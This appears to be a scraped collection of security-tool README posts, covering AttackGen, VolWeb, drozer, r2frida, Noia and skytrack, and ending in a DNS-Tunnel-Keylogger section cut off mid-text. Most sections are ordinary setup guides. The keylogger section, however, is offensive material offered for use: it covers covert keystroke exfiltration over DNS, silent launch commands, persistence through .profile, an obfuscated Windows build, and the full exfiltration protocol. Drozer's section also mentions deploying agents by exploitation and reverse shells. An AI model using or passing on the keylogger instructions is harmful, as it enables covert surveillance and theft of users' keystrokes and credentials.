        • Capture user feedback on the quality of the generated scenarios.
        • Downloadable scenarios in Markdown format.
        • 🆕 Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
        • Available as a Docker container image for easy deployment.
        • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


        Releases

        v0.4 (current)

        • Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
        • Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
        • Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
        • Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

        v0.3

        • Azure OpenAI Service Integration:
        - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.
        - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
        • LangSmith for Azure OpenAI Service:
        - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.
        - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
        • Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
        • Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

        v0.2

        • Custom Scenarios based on ATT&CK Techniques:
        - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.
        - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
        • User feedback on generated scenarios: Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
        • Improved error handling for missing API keys: Improved user experience.
        • Replaced Streamlit st.spinner widgets with the new st.status widget: Provides better visibility into long-running processes (i.e. scenario generation).

        v0.1

        Initial release.

        Requirements

        • Recent version of Python.
        • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
        • OpenAI API key.
        • LangChain API key (optional) - see LangSmith Setup section below for further details.
        • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

        Installation

        Option 1: Cloning the Repository

        1. Clone this repository:
        git clone https://github.com/mrwadams/attackgen.git
        2. Change directory into the cloned repository:
        cd attackgen
        3. Install the required Python packages:
        pip install -r requirements.txt

        Option 2: Using Docker

        1. Pull the Docker container image from Docker Hub:
        docker pull mrwadams/attackgen

        LangSmith Setup

        If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

        If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.
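        For reference, a minimal .streamlit/secrets.toml might look like the following sketch (the only key shown is the LANGCHAIN_API_KEY field mentioned above; leave the value empty if you are not using LangSmith):

```toml
# .streamlit/secrets.toml - minimal sketch
# Leave the value empty to skip LangSmith logging; AttackGen will show an informative message instead.
LANGCHAIN_API_KEY = ""
```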

        Data Setup

        Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.
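        Once enterprise-attack.json is in place, note that the STIX dataset is plain JSON: techniques are objects of type "attack-pattern" inside the bundle's "objects" array. As a hedged sketch of how such a bundle can be inspected with only the standard library (the inline bundle below is a toy stand-in for the real dataset):

```python
import json

# Toy stand-in for the real enterprise-attack.json STIX bundle.
bundle_text = json.dumps({
    "type": "bundle",
    "objects": [
        {"type": "attack-pattern", "name": "Phishing"},
        {"type": "intrusion-set", "name": "Example Group"},
    ],
})

def technique_names(stix_json):
    """Return the names of all attack-pattern (technique) objects in a STIX bundle."""
    bundle = json.loads(stix_json)
    return [o["name"] for o in bundle.get("objects", []) if o.get("type") == "attack-pattern"]

print(technique_names(bundle_text))  # -> ['Phishing']
```

        In AttackGen itself this parsing is handled by the mitreattack library listed in the requirements; the sketch above only illustrates the shape of the data file you are downloading.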

        Running AttackGen

        After the data setup, you can run AttackGen with the following command:

        streamlit run 👋_Welcome.py

        You can also try the app on Streamlit Community Cloud.

        Usage

        Running AttackGen

        Option 1: Running the Streamlit App Locally

        1. Run the Streamlit app:
        streamlit run 👋_Welcome.py
        2. Open your web browser and navigate to the URL provided by Streamlit.
        3. Use the app to generate standard or custom incident response scenarios (see below for details).

        Option 2: Using the Docker Container Image

        1. Run the Docker container:
        docker run -p 8501:8501 mrwadams/attackgen

        This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine.
        2. Open your web browser and navigate to http://localhost:8501.
        3. Use the app to generate standard or custom incident response scenarios (see below for details).

        Generating Scenarios

        Standard Scenario Generation

        1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
        2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
        3. Select your organisation's industry and size from the dropdown menus.
        4. Navigate to the Threat Group Scenarios page.
        5. Select the Threat Actor Group that you want to simulate.
        6. Click on 'Generate Scenario' to create the incident response scenario.
        7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

        Custom Scenario Generation

        1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
        2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
        3. Select your organisation's industry and size from the dropdown menus.
        4. Navigate to the Custom Scenario page.
        5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
        6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
        7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

        Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

        Contributing

        I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

        Licence

        This project is licensed under GNU GPLv3.



        VolWeb - A Centralized And Enhanced Memory Analysis Platform

        By: Zion3R


        VolWeb is a digital forensic memory analysis platform that leverages the power of the Volatility 3 framework. It is dedicated to aiding in investigations and incident responses.


        Objective

        The goal of VolWeb is to enhance the efficiency of memory collection and forensic analysis by providing a centralized, visual, and enhanced web application for incident responders and digital forensics investigators. Once an investigator obtains a memory image from a Linux or Windows system, the evidence can be uploaded to VolWeb, which triggers automatic processing and extraction of artifacts using the power of the Volatility 3 framework.

        By utilizing cloud-native storage technologies, VolWeb also enables incident responders to directly upload memory images into the VolWeb platform from various locations using dedicated scripts interfaced with the platform and maintained by the community. Another goal is to allow users to compile technical information, such as Indicators, which can later be imported into modern CTI platforms like OpenCTI, thereby connecting your incident response and CTI teams after your investigation.

        Project Documentation and Getting Started Guide

        The project documentation is available on the Wiki. There, you will be able to deploy the tool in your investigation environment or lab.

        [!IMPORTANT] Take the time to read the documentation in order to avoid common misconfiguration issues.

        Interacting with the REST API

        VolWeb exposes a REST API to allow analysts to interact with the platform. A dedicated repository offers some scripts maintained by the community: https://github.com/forensicxlab/VolWeb-Scripts. Check the project wiki to learn more about the possible API calls.
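        The exact endpoints and authentication scheme are documented in the wiki. Purely as an illustration of the general pattern (the /api/evidences/ path and token header below are assumptions for this sketch, not confirmed details of the VolWeb API), an authenticated request could be built like this:

```python
import urllib.request

# Hypothetical values for illustration; consult the VolWeb wiki for the real API details.
BASE_URL = "https://volweb.example.local"
API_TOKEN = "changeme"

def build_request(path):
    """Build (but do not send) an authenticated GET request for a VolWeb endpoint."""
    return urllib.request.Request(
        BASE_URL + path,
        headers={"Authorization": "Token " + API_TOKEN},
        method="GET",
    )

req = build_request("/api/evidences/")  # hypothetical endpoint name
print(req.full_url, req.get_header("Authorization"))
```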

        Issues

        If you have encountered a bug, or wish to propose a feature, please feel free to open an issue. To enable us to address it quickly, follow the guide in the "Contributing" section of the Wiki associated with the project.

        Contact

        Contact me at k1nd0ne@mail.com for any questions regarding this tool.

        Next Release Goals

        Check out the roadmap: https://github.com/k1nd0ne/VolWeb/projects/1



        Drozer - The Leading Security Assessment Framework For Android

        By: Zion3R


        drozer (formerly Mercury) is the leading security testing framework for Android.

        drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

        drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

        drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience to show the impact of letting certain components be exported on a device.

        drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


        Docker Container

        To help ensure that drozer can be run on modern systems, a Docker container was created with a working build of drozer. This is currently the recommended method of using drozer on modern systems.

        • The Docker container and basic setup instructions can be found here.
        • Instructions on building your own Docker container can be found here.

        Manual Building and Installation

        Prerequisites

        1. Python 2.7

        Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

        2. Protobuf 2.6 or greater

        3. Pyopenssl 16.2 or greater

        4. Twisted 10.2 or greater

        5. Java Development Kit 1.7

        Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

        6. Android Debug Bridge

        Building Python wheel

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        python setup.py bdist_wheel

        Installing Python wheel

        sudo pip install dist/drozer-2.x.x-py2-none-any.whl

        Building for Debian/Ubuntu/Mint

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        make deb

        Installing .deb (Debian/Ubuntu/Mint)

        sudo dpkg -i drozer-2.x.x.deb

        Building for Redhat/Fedora/CentOS

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        make rpm

        Installing .rpm (Redhat/Fedora/CentOS)

        sudo rpm -i drozer-2.x.x-1.noarch.rpm

        Building for Windows

        NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

        git clone https://github.com/WithSecureLabs/drozer.git
        cd drozer
        python.exe setup.py bdist_msi

        Installing .msi (Windows)

        Run dist/drozer-2.x.x.win-x.msi 

        Usage

        Installing the Agent

        Drozer can be installed using Android Debug Bridge (adb).

        Download the latest Drozer Agent here.

        $ adb install drozer-agent-2.x.x.apk

        Starting a Session

        You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

        We will use the server embedded in the drozer Agent to do this.

        If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

        $ adb forward tcp:31415 tcp:31415

        Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

        Then, on your PC, connect using the drozer Console:

        On Linux:

        $ drozer console connect

        On Windows:

        > drozer.bat console connect

        If using a real device, the IP address of the device on the network must be specified:

        On Linux:

        $ drozer console connect --server 192.168.0.10

        On Windows:

        > drozer.bat console connect --server 192.168.0.10

        You should be presented with a drozer command prompt:

        selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
        dz>

        The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

        You are now ready to start exploring the device.

        Command Reference

        Command Description
        run Executes a drozer module
        list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
        shell Start an interactive Linux shell on the device, in the context of the Agent process.
        cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
        clean Remove temporary files stored by drozer on the Android device.
        contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
        echo Print text to the console.
        exit Terminate the drozer session.
        help Display help about a particular command or module.
        load Load a file containing drozer commands, and execute them in sequence.
        module Find and install additional drozer modules from the Internet.
        permissions Display a list of the permissions granted to the drozer Agent.
        set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
        unset Remove a named variable that drozer passes to any Linux shells that it spawns.

        License

        drozer is released under a 3-clause BSD License. See LICENSE for full details.

        Contacting the Project

        drozer is Open Source software, made great by contributions from the community.

        Bug reports, feature requests, comments and questions can be submitted here.



        R2Frida - Radare2 And Frida Better Together

        By: Zion3R


        This is a self-contained plugin for radare2 that allows you to instrument remote processes using Frida.

        The radare project provides a complete toolchain for reverse engineering, with well-maintained functionality that can be extended with other programming languages and tools.

        Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


        Features

        • Run unmodified Frida scripts (Use the :. command)
        • Execute snippets in C, Javascript or TypeScript in any process
        • Can attach, spawn or launch in local or remote systems
        • List sections, symbols, exports, protocols, classes, methods
        • Search for values in memory inside the agent or from the host
        • Replace method implementations or create hooks with short commands
        • Load libraries and frameworks in the target process
        • Support Dalvik, Java, ObjC, Swift and C interfaces
        • Manipulate file descriptors and environment variables
        • Send signals to the process, continue, breakpoints
        • The r2frida io plugin is also a filesystem fs and debug backend
        • Automate r2 and frida using r2pipe
        • Read/Write process memory
        • Call functions, syscalls and raw code snippets
        • Connect to frida-server via usb or tcp/ip
        • Enumerate apps and processes
        • Trace registers, arguments of functions
        • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
        • Doesn't require frida to be installed in the host (no need for frida-tools)
        • Extend the r2frida commands with plugins that run in the agent
        • Change page permissions, patch code and data
        • Resolve symbols by name or address and import them as flags into r2
        • Run r2 commands in the host from the agent
        • Use r2 apis and run r2 commands inside the remote target process.
        • Native breakpoints using the :db api
        • Access remote filesystems using the r_fs api.

        Installation

        The recommended way to install r2frida is via r2pm:

        $ r2pm -ci r2frida

        Binary builds that don't require compilation will soon be supported in r2pm and r2env. Meanwhile, feel free to download the latest builds from the Releases page.

        Compilation

        Dependencies

        • radare2
        • pkg-config (not required on windows)
        • curl or wget
        • make, gcc
        • npm, nodejs (will soon be removed)

        In GNU/Debian you will need to install the following packages:

        $ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

        Instructions

        $ git clone https://github.com/nowsecure/r2frida.git
        $ cd r2frida
        $ make
        $ make user-install

        Windows

        • Install meson and Visual Studio
        • Unzip the latest radare2 release zip in the r2frida root directory
        • Rename it to radare2 (instead of radare2-x.y.z)
        • To make the VS compiler available in PATH (preconfigure.bat)
        • Run configure.bat and then make.bat
        • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS

        Usage

        For testing, use r2 frida://0, as attaching to pid 0 in frida is a special session that runs locally. Now you can run the :? command to get the list of available commands.

        $ r2 'frida://?'
        r2 frida://[action]/[link]/[device]/[target]
        * action = list | apps | attach | spawn | launch
        * link = local | usb | remote host:port
        * device = '' | host:port | device-id
        * target = pid | appname | process-name | program-in-path | abspath
        Local:
        * frida://? # show this help
        * frida:// # list local processes
        * frida://0 # attach to frida-helper (no spawn needed)
        * frida:///usr/local/bin/rax2 # abspath to spawn
        * frida://rax2 # same as above, considering local/bin is in PATH
        * frida://spawn/$(program) # spawn a new process in the current system
        * frida://attach/(target) # attach to target PID in current host
        USB:
        * frida://list/usb// # list processes in the first usb device
        * frida://apps/usb// # list apps in the first usb device
        * frida://attach/usb//12345 # attach to given pid in the first usb device
        * frida://spawn/usb//appname # spawn an app in the first resolved usb device
        * frida://launch/usb//appname # spawn+resume an app in the first usb device
        Remote:
        * frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
        Environment: (Use the `%` command to change the environment at runtime)
        R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
        R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
        R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
        R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

        Examples

        $ r2 frida://0     # same as frida -p 0, connects to a local session

        You can attach, spawn or launch any program by name or pid. The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this):

        $ r2 frida://rax2  # attach to the first process named `rax2`
        $ r2 frida://1234 # attach to the given pid

        Using the absolute path of a binary to spawn will spawn the process:

        $ r2 frida:///bin/ls
        [0x00000000]> :dc # continue the execution of the target program

        Also works with arguments:

        $ r2 frida://"/bin/ls -al"

        For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

        $ r2 frida://spawn/usb/         # enumerate devices
        $ r2 frida://spawn/usb// # enumerate apps in the first iOS device
        $ r2 frida://spawn/usb//Weather # Run the weather app

        Commands

        These are the most frequent commands, so you should learn them and suffix them with ? to get subcommand help.

        :i        # get information of the target (pid, name, home, arch, bits, ..)
        .:i* # import the target process details into local r2
        :? # show all the available commands
        :dm # list maps. Use ':dm|head' and seek to the program base address
        :iE # list the exports of the current binary (seek)
        :dt fread # trace the 'fread' function
        :dt-* # delete all traces

        Plugins

        r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

        See the plugins/ directory for some more example plugin scripts.

        [0x00000000]> cat example.js
        r2frida.pluginRegister('test', function(name) {
          if (name === 'test') {
            return function(args) {
              console.log('Hello Args From r2frida plugin', args);
              return 'Things Happen';
            }
          }
        });
        [0x00000000]> :. example.js # load the plugin script

        The :. command works like the r2's . command, but runs inside the agent.

        :. a.js  # run script which registers a plugin
        :. # list plugins
        :.-test # unload a plugin by name
        :.. a.js # eternalize script (keeps running after detach)

        Termux

        If you want to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of symbol resolution. The way to make this work is to extend the LD_LIBRARY_PATH environment variable to point to the system directory before the Termux libdir.

        $ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

        Troubleshooting

        Ensure you are using a modern version of r2 (preferably the latest release or git).

        Run r2 -L | grep frida to verify that the plugin is loaded; if nothing is printed, set the R2_DEBUG=1 environment variable to get debugging messages that reveal the reason.

        If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page. Bear in mind that only the MAJOR.MINOR version must match; that is, r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

        Design

        +---------+
        | radare2 |   The radare2 tool, on top of the rest
        +---------+
             :
        +----------+
        | io_frida |  r2frida io plugin
        +----------+
             :
        +---------+
        |  frida  |   Frida host APIs and logic to interact with target
        +---------+
             :
        +-------+
        |  app  |     Target process instrumented by Frida with Javascript
        +-------+

        Credits

        This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

        I would like to thank Ole André for writing and maintaining Frida, as well as being so kind as to proactively fix bugs and discuss technical details on anything needed to make this union work. Kudos!



        Noia - Simple Mobile Applications Sandbox File Browser Tool

        By: Zion3R


        Noia is a web-based tool whose main aim is to ease the process of browsing mobile application sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

        Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, and open an issue if you find any problems. PRs are welcome.


        Installation & Usage

        npm install -g noia
        noia

        Features

        • Explore third-party applications' files and directories. Noia shows you details including access permissions, file type and much more.

        • View custom binary files. Directly preview SQLite databases, images, and more.

        • Search application by name.

        • Search files and directories by name.

        • Navigate to a custom directory using the ctrl+g shortcut.

        • Download the application files and directories for further analysis.

        • Basic iOS support

        and more


        Setup

        Desktop requirements:

        • node.js LTS and npm
        • Any decent modern desktop browser

        Noia is available on npm, so just type the following command to install it and run it:

        npm install -g noia
        noia

        Device setup:

        Noia is powered by frida.re, thus requires Frida to run.

        Rooted Device

        See:

        • https://frida.re/docs/android/
        • https://frida.re/docs/ios/

        Non-rooted Device

        • https://koz.io/using-frida-on-android-without-root/
        • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
        • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

        Security Warning

        This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

        LICENCE

        MIT



        Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

        By: Zion3R

        About

        skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


        What is Planespotting & Aircraft OSINT?

        Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject, in this case planes!

        Aircraft Information

        • Tail Number πŸ›«
        • Aircraft Type βš™οΈ
        • ICAO24 Designation πŸ”Ž
        • Manufacturer Details πŸ› 
        • Flight Logs πŸ“„
        • Aircraft Owner ✈️
        • Model πŸ›©
        • Much more!

        Usage

        To run skytrack on your machine, follow the steps below:

        $ git clone https://github.com/ANG13T/skytrack
        $ cd skytrack
        $ pip install -r requirements.txt
        $ python skytrack.py

        skytrack requires Python 3.


        Features

        skytrack features three main functions for aircraft information gathering and display. They include the following:

        Aircraft Reconnaissance & OSINT

        skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

        PDF Aircraft Information Report

        skytrack also enables you to save the collected aircraft information as a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The report will be named "skytrack_report.pdf".

        Tail Number to ICAO Converter

        There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length hexadecimal ID. Both standards are highly pertinent for aircraft reconnaissance, as either can be used to search for a specific aircraft in data sources. However, converting from one format to the other is rather cumbersome, as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

        Further Explanation

        ICAO and Tail Numbers follow a mapping system like the following:

        ICAO address    N-Number (Tail Number)
        a00001          N1
        a00002          N1A
        a00003          N1AA
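        The sequential mapping above can be illustrated with a minimal Python sketch. The dictionary below holds only the three sample pairs from the table (the real FAA allocation spans the full US range and follows a more involved algorithm, which skytrack implements); the `icao_to_tail` helper is hypothetical, not skytrack's API:

```python
from typing import Optional

# Illustrative only: just the three example pairs from the table above.
ICAO_TO_N = {
    "a00001": "N1",
    "a00002": "N1A",
    "a00003": "N1AA",
}

def icao_to_tail(icao: str) -> Optional[str]:
    """Look up the N-Number for a known ICAO24 hex address."""
    return ICAO_TO_N.get(icao.lower())

print(icao_to_tail("A00001"))  # N1
```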

        You can learn more about aircraft registration numbers here: https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers

        :warning: Converter only works for USA-registered aircraft

        Data Sources & APIs Used

        ICAO Aircraft Type Designators Listings

        FlightAware

        Wikipedia

        Aviation Safety Website

        Jet Photos Website

        OpenSky API

        Aviation Weather METAR

        Airport Codes Dataset

        Contributing

        skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

        Upcoming

        • Obtain Latest Flown Airports
        • Obtain Airport Information
        • Obtain ATC Frequency Information

        Support

        If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

        To check out my other works, visit my GitHub profile.



        DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

        By: Zion3R


        This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

        These tools excel at lightweight exfiltration and persistence, properties that help them evade detection. The client uses DNS tunneling/exfiltration to bypass firewalls and avoid detection.


        Server

        Setup

        The server uses python3.

        To install dependencies, run python3 -m pip install -r requirements.txt

        Starting the Server

        To start the server, run python3 main.py

        usage: dns exfiltration server [-h] [-p PORT] ip domain

        positional arguments:
        ip
        domain

        options:
        -h, --help show this help message and exit
        -p PORT, --port PORT port to listen on

        By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

        ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

        domain is the domain to listen for, which should be the domain that the server is authoritative for.

        Registrar

        On the registrar, change your domain's nameservers to custom DNS.

        Point them to two hostnames, ns1.example.com and ns2.example.com.

        Add records that point those nameserver hostnames to your exfiltration server's IP address.

        This is the same as setting glue records.

        Client

        Linux

        The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

        logger.sh

        # Usage: logger.sh [-options] domain
        # Positional Arguments:
        # domain: the domain to send data to
        # Options:
        # -p path: give path to log file to listen to
        # -l: run the logger with warnings and errors printed

        To start the keylogger, run the command ./logger.sh [domain] &> /dev/null && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end causes the shell to close on exit; without it, exiting would bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

        The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

        The -l option will show warnings and errors. Can be useful for debugging.

        logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile so it starts in every new interactive shell.

        connection.sh

        Usage: command [-options] domain
        Positional Arguments:
        domain: the domain to send data to
        Options:
        -n: number of characters to store before sending a packet

        Windows

        Build

        To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output a file named logger.exe in the build directory.

        make production domain=example.com

        You can also choose to build the program with debugging by making the debug target.

        make debug domain=example.com

        For both targets, you will need to specify the domain the server is listening for.

        Sending Test Requests

        You can use dig to send requests to the server:

        dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.

        dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.

        Replace example.com with the domain the server is listening for.

        Protocol

        Starting a Connection

        A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

        The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

        The server will respond with an IP address in following format: 123.123.123.[id]

        Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
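        A client can recover its assigned id from the last octet of that answer. A minimal sketch (a hypothetical helper for illustration, not part of the published client):

```python
def parse_client_id(answer_ip: str) -> int:
    # Connection responses have the form 123.123.123.[id],
    # where the last octet carries the client id (1-254).
    return int(answer_ip.split(".")[-1])

print(parse_client_id("123.123.123.7"))  # 7
```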

        Exfiltrating Data

        A record requests starting with b indicate exfiltrated data being sent to the server.

        The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

        The server will respond with [code].123.123.123

        id is the id that was established on connection. Data is sent as ASCII encoded in hex.

        code is one of the codes described below.
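        Assuming the formats above, constructing an exfiltration query name can be sketched in a few lines of Python (a hypothetical helper for illustration, not the project's actual client code):

```python
def exfil_query(packet_num: int, client_id: int, data: str, sld: str, tld: str) -> str:
    """Build a b-record query name: b.[packet #].[id].[data].[sld].[tld]."""
    hexdata = data.encode("ascii").hex().upper()
    # Note: a single DNS label is limited to 63 bytes, so a real client
    # must chunk longer payloads across multiple queries.
    return f"b.{packet_num}.{client_id}.{hexdata}.{sld}.{tld}"

print(exfil_query(1, 1, "Hi", "example", "com"))  # b.1.1.4869.example.com
```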

        Response Codes

        200: OK

        If the client sends a request that is processed normally, the server will respond with code 200.

        201: Malformed Record Requests

        If the client sends a malformed record request, the server will respond with code 201.

        202: Non-Existent Connections

        If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

        203: Out of Order Packets

        If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

        204: Max Connections Reached

        If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.
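        On the client side, the status can be read back from the first octet of the answer; a minimal sketch (a hypothetical helper for illustration):

```python
def parse_response_code(answer_ip: str) -> int:
    # Data responses have the form [code].123.123.123,
    # with the status code in the first octet.
    return int(answer_ip.split(".")[0])

print(parse_response_code("200.123.123.123"))  # 200
```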

        Dropped Packets

        Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

        Side Notes

        Linux

        Log File

